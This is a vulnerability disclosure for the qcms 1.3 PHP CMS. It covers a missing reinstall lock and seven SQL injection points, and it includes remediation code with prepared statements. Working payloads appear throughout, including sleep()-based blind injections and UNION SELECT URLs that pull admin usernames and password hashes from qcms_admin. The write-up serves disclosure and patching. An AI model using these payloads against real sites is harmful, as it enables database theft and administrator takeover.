qcms 1.3 reinstallation vulnerability && injection vulnerabilities

qcms 1.3

Download address: http://down.admin5.com/php/1402.html

1. Vulnerable file qcms/install/index.php:

1.1 The installer performs no install-lock check at all; anyone who knows the database account and password can simply reinstall.
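A guard for the missing install-lock check, added here as an example and not code from qcms; the lock file name install/install.lock and the function names are assumptions:

```php
<?php
// Added example, not qcms code: an install-lock guard for qcms/install/index.php.
// Assumption: the lock file lives beside the installer as install/install.lock.
define('INSTALL_LOCK', dirname(__FILE__) . '/install.lock');

function install_is_locked()
{
    return is_file(INSTALL_LOCK);
}

// Call this at the very top of install/index.php, before any form input is read,
// so that knowing the database credentials is no longer enough to rerun setup.
function refuse_if_installed()
{
    if (install_is_locked()) {
        http_response_code(403);
        exit('qcms is already installed; remove install/install.lock (better: the whole install/ directory) only for an intentional reinstall.');
    }
}

// Call this once installation has actually succeeded (tables created, admin written).
// LOCK_EX stops two concurrent installer requests from racing on the file.
function write_install_lock()
{
    return file_put_contents(INSTALL_LOCK, date('c'), LOCK_EX) !== false;
}

refuse_if_installed();
```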

2. Vulnerable file qcms/inc/hits.php, lines 3-10:

<?php
// qcms/inc/hits.php, lines 3-10 (lines 1-2, the includes, are not shown on the page)
$nid=$_GET['id'];                 // id taken straight from the request
$ns=new news;
$result=$ns->news_view($nid);     // first query using $nid
$qesy=$ns->news_hits($nid);       // second query using the same $nid
$nmyrow=mysql_fetch_array($result);
echo "document.writeln('".$nmyrow['readcount']."')";
?>

Following the two functions of the qcms news class:

function news_view($id)
{
    global $bqz;
    // $id is concatenated into the SQL string with no validation
    $exec="select ".$bqz."news.*,".$bqz."category.* from ".$bqz."news,".$bqz."category where ".$bqz."news.cid=".$bqz."category.cid and newsid=".$id."";
    $result=mysql_query($exec);
    return $result;
}

function news_hits($id)
{
    global $bqz;
    // the same unvalidated $id goes into the update statement
    $exec="update ".$bqz."news set readcount=readcount+1 where newsid=".$id."";
    mysql_query($exec);
}

sql injection 1:

news_view has no filtering at all, so time-based blind injection is possible.

news_hits has no filtering either, but its MySQL statement runs right after news_view's, so it is not considered separately here.

payload:

http://localhost/inc/hits.php?id=2 and sleep(1) // 2-second delay (the same id runs in both news_view and news_hits, so sleep(1) fires twice)

http://localhost/inc/hits.php?id=2 and sleep(0) // no delay
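A hardened version of news_view/news_hits and the hits.php caller, added here as an example and not qcms code; the same change (integer validation plus a bound parameter) fixes every other id-based query on this page (buy.php, down.php, cate_info, jss_view, diy_view). It assumes a mysqli connection with mysqlnd (for get_result()), the table prefix qcms_ seen in the payloads, and placeholder credentials:

```php
<?php
// Added example, not qcms code: hardened replacements for news_view() and
// news_hits() from qcms/inc/news.php and for the body of qcms/inc/hits.php.
// Assumptions: mysqli with mysqlnd, prefix $bqz = 'qcms_', placeholder DB credentials.

$bqz = 'qcms_';

// Accept only a plain positive integer; "2 and sleep(1)" or "-1943 union ..." -> null.
function clean_news_id($raw)
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    return ($id === false) ? null : $id;
}

// Same join as the original news_view(), with the id bound instead of concatenated.
function news_view_safe(mysqli $db, $bqz, $id)
{
    $sql = "select n.*, c.* from {$bqz}news n, {$bqz}category c"
         . " where n.cid = c.cid and n.newsid = ?";
    $stmt = $db->prepare($sql);
    $stmt->bind_param('i', $id);
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc();   // null when no such newsid
}

// Same counter update as news_hits(), also bound; returns rows affected (0 or 1).
function news_hits_safe(mysqli $db, $bqz, $id)
{
    $stmt = $db->prepare("update {$bqz}news set readcount = readcount + 1 where newsid = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    return $stmt->affected_rows;
}

// Replacement body for hits.php: validate first, fail closed, bind everything.
$nid = clean_news_id(isset($_GET['id']) ? $_GET['id'] : '');
if ($nid === null) {
    http_response_code(400);
    exit("document.writeln('0')");
}
$db  = new mysqli('localhost', 'DB_USER', 'DB_PASS', 'DB_NAME');   // placeholders
$row = news_view_safe($db, $bqz, $nid);
if ($row === null) {
    http_response_code(404);
    exit("document.writeln('0')");
}
news_hits_safe($db, $bqz, $nid);
// Cast on output too, so nothing read from the database is emitted as script text.
echo "document.writeln('" . (int)$row['readcount'] . "')";
```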

3. Vulnerable file qcms/buy.php, lines 6-28:

if(isset($_GET['id']))
{
    $cn=new sys();
    // $_GET['id'] is concatenated into the query string unvalidated
    $result=$cn->view("select * from ".$bqz."news where newsid=".$_GET['id']."");
    $rs=mysql_fetch_array($result);

    if($rs['c_field']!='')
    {
        $c_field=explode('o',$rs['c_field']);
    }
    else
    {
        echo "<script>alert('".$lang["cs_err"]."');history.back();</script>";
        return ;
    }
    for($i=0;$i<count($c_field);$i++)
    {
        $field=explode('|||',$c_field[$i]);
        if(is_array($field))
        {
            $rc_field[$field[0]]=$field[1];
        }
    }
}   // closes if(isset($_GET['id'])); this brace is not part of the page's excerpt

Following the view function of the qcms sys class, qcms/inc/sys.php lines 462-466:

function view($sql)
{
    $result=mysql_query($sql);   // executes whatever SQL string it is handed
    return $result;
}

sql injection 2:

As can be seen there is no filtering at all; boolean-based blind, time-based blind and UNION query injection are all possible.

payload:

http://localhost/buy.php?id=-1943%20union%20select%201,2,3,4,concat_ws(0x20,id,admin_name,admin_password),6,7,8,9,10,11,12,13,14%20from%20qcms_admin%23

4. Vulnerable file qcms/down.php, lines 5-28:

if(isset($_GET['id']))
{
    $cn=new sys();
    // same pattern as buy.php: $_GET['id'] concatenated into the query
    $result=$cn->view("select * from ".$bqz."news where newsid=".$_GET['id']."");
    $rs=mysql_fetch_array($result);

    if($rs['c_field']!='')
    {
        $c_field=explode('¡ð',$rs['c_field']);
    }
    else
    {
        echo "<script>alert('".$lang["cs_err"]."');history.back();</script>";
        return ;
    }
    for($i=0;$i<count($c_field);$i++)
    {
        $field=explode('|||',$c_field[$i]);
        if(is_array($field))
        {
            $rc_field[$field[0]]=$field[1];
        }
    }
}

sql injection 3:

As can be seen there is no filtering at all; boolean-based blind, time-based blind and UNION query injection are all possible.

payload:

http://localhost/down.php?id=-1943%20union%20select%201,2,3,4,concat_ws(0x20,id,admin_name,admin_password),6,7,8,9,10,11,12,13,14%20from%20qcms_admin%23

5. Vulnerable file qcms/inc/category.php, lines 30-35:

function cate_info($cid)
{
    global $bqz;
    $sql="select * from ".$bqz."category where cid=$cid"; // value substituted directly into the query
    $result=mysql_query($sql);
    return $result;
}

Search globally for the callers of cate_info.

Following qcms/inc/temp.php, lines 32-40:

function list_temp($id,$page_html='')
{
    global $install; global $temp_url;
    $cate=new category;
    $result=$cate->cate_info($id);    // $id passed on unvalidated
    $cmyrow=mysql_fetch_array($result);
    $xx=replace_list(file_get_contents($_SERVER['DOCUMENT_ROOT'].$install."templist/".$temp_url."/".$cmyrow['ctemp']),$id,$page_html);
    return $xx;
}

Search globally for the callers of list_temp.

Following qcms/list.php, lines 26-33:

    // excerpt begins inside the if($c_open==1) branch
    echo list_temp($_GET['id']);      // id straight from GET
    $c->end();
}
else
{
    echo list_temp($_GET['id']);
}
?>

sql injection 4:

As can be seen the id value is passed straight from GET with no filtering; boolean-based blind, time-based blind and UNION query injection are all possible.

6. Vulnerable file qcms/sys.php, lines 326-331:

function jss_view()
{
    global $bqz;
    // reads $_GET['id'] itself and concatenates it into the query
    $exec="select * from ".$bqz."jss where id=".$_GET['id']."";
    $result=mysql_query($exec);
    return $result;
}

Search for the functions that call jss_view.

Following qcms/inc/temp.php, lines 75-82:

function js_temp($id)
{
    global $install;
    $sys=new sys;
    $result=$sys->jss_view($id);   // note jss_view() ignores $id and reads $_GET['id'] itself
    $dmyrow=mysql_fetch_array($result);
    return replace_index($dmyrow['js_code']);
}

Search for the functions that call js_temp.

Following qcms/inc/js.php:

<?php
include("conn.php");
include("category.php");
include("news.php");
include("sys.php");
include("tfunction.php");
include("temp.php");
require_once("cache.php");
?>
<?
global $install;
if($c_open==1)
{
    $c = new cache();
    $c->start();
?>
document.writeln('<?=dm2js(js_temp($_GET['id']))?>');   // line 17
<?php
    $c->end();
}
else
{
?>
document.writeln('<?=dm2js(js_temp($_GET['id']))?>');
<?php
}
?>

sql injection 5:

Line 17 uses the id value straight from GET with no filtering; boolean-based blind, time-based blind and UNION query injection are all possible.

payload: http://localhost/inc/js.php?id=1%20union%20select%201,2,concat_ws(0x20,id,admin_name,admin_password)%20from%20qcms_admin%23

7. Vulnerable file qcms/sys.php, lines 227-232:

function diy_view($id)
{
    global $bqz;
    // $id concatenated into the query with no validation
    $exec="select * from ".$bqz."diy where id=".$id."";
    $result=mysql_query($exec);
    return $result;
}

Following diy_view, qcms/inc/temp.php, lines 59-74:

function diy_temp($diyid) // custom page template
{
    global $install;
    if(empty($_GET['id'])==true)
    {
        $id=$diyid;
    }
    else
    {
        $id=$_GET['id'];    // a GET id overrides the caller's value, unvalidated
    }
    $sys=new sys;
    $result=$sys->diy_view($id);
    $dmyrow=mysql_fetch_array($result);
    return replace_index($dmyrow['diy']);
}

Following diy_temp, qcms/diy.php:

<?php
include("inc/conn.php");
include("language/".$language);
include("inc/category.php");
include("inc/news.php");
include("inc/sys.php");
include("inc/tfunction.php");
if($html=='0'){
    define("temp", "temp");
}
elseif($html=='1'){
    define("temp", "temp_html");
}
elseif($html=='2'){
    define("temp", "temp_rewrite");
}
include("inc/".temp.".php");
require_once("inc/cache.php");
?>
<?
global $install;
if($c_open==1)
{
    $c = new cache();
    $c->start();
    echo diy_temp($_GET['id']);   // line 26
    $c->end();
}
else
{
    echo diy_temp($_GET['id']);   // line 31
}
?>

sql injection 6:

Lines 26 and 31 use the id value straight from GET with no filtering; boolean-based blind, time-based blind and UNION query injection are all possible.

8. Vulnerable file qcms/search.php, lines 80-94:

<?php
$keyword=$_POST['keyword'];          // keyword straight from POST
if(empty($keyword)==true)
{
    echo $lang["please_click_keyword"];
}
else
{
    $keys=new news;
    $result=$keys->news_search($keyword);
    while($keyrow=mysql_fetch_array($result))
    {
        // the loop body (result template) continues past line 94, outside the page's excerpt
?>

Following qcms/inc/news.php, lines 170-175:

function news_search($keyword) // search for entries whose title contains the keyword
{
    global $bqz;
    // keyword concatenated straight into the LIKE pattern
    $exec="select * from ".$bqz."news where ntitle like '%".$keyword."%'";
    $result=mysql_query($exec);
    return $result;
}

sql injection 7:

Line 172 does not filter the value and substitutes it directly into the query; boolean-based blind and time-based blind injection are possible:

payload:

keyword=-5279' OR 1869=1868#&button=%E6%90%9C%E7%B4%A2

keyword=-5279' OR 1869=1869#&button=%E6%90%9C%E7%B4%A2
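A hardened news_search for the keyword case, added here as an example and not qcms code. Unlike the numeric ids above, a search term is free text, so binding alone is not enough: the LIKE wildcards % and _ inside the keyword must also be escaped, or any keyword can be turned into "match everything". It assumes a mysqli connection with mysqlnd, the prefix qcms_, and placeholder credentials:

```php
<?php
// Added example, not qcms code: hardened replacement for news_search() in
// qcms/inc/news.php. Assumptions: mysqli with mysqlnd, prefix 'qcms_', placeholder credentials.

// Build the LIKE pattern: cap the length, then escape the escape character '!'
// and the wildcards '%' and '_' so they match literally. str_replace applies the
// pairs in order, so '!' is doubled before any new '!' is introduced.
function like_pattern($keyword, $max_len = 64)
{
    $keyword = mb_substr(trim($keyword), 0, $max_len, 'UTF-8');
    $escaped = str_replace(array('!', '%', '_'), array('!!', '!%', '!_'), $keyword);
    return '%' . $escaped . '%';
}

// The keyword is bound as a parameter, so "-5279' OR 1869=1869#" is just a
// literal title fragment, and ESCAPE '!' tells MySQL which character we used above.
function news_search_safe(mysqli $db, $bqz, $keyword)
{
    $pattern = like_pattern($keyword);
    $stmt = $db->prepare("select * from {$bqz}news where ntitle like ? escape '!'");
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    return $stmt->get_result();
}

// Usage in place of the search.php excerpt above.
$keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';
if ($keyword === '') {
    exit('please enter a keyword');
}
$db  = new mysqli('localhost', 'DB_USER', 'DB_PASS', 'DB_NAME');   // placeholders
$res = news_search_safe($db, 'qcms_', $keyword);
while ($row = $res->fetch_assoc()) {
    // encode on output as well, so titles cannot inject script into the page
    echo htmlspecialchars($row['ntitle'], ENT_QUOTES, 'UTF-8'), "<br>\n";
}
```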
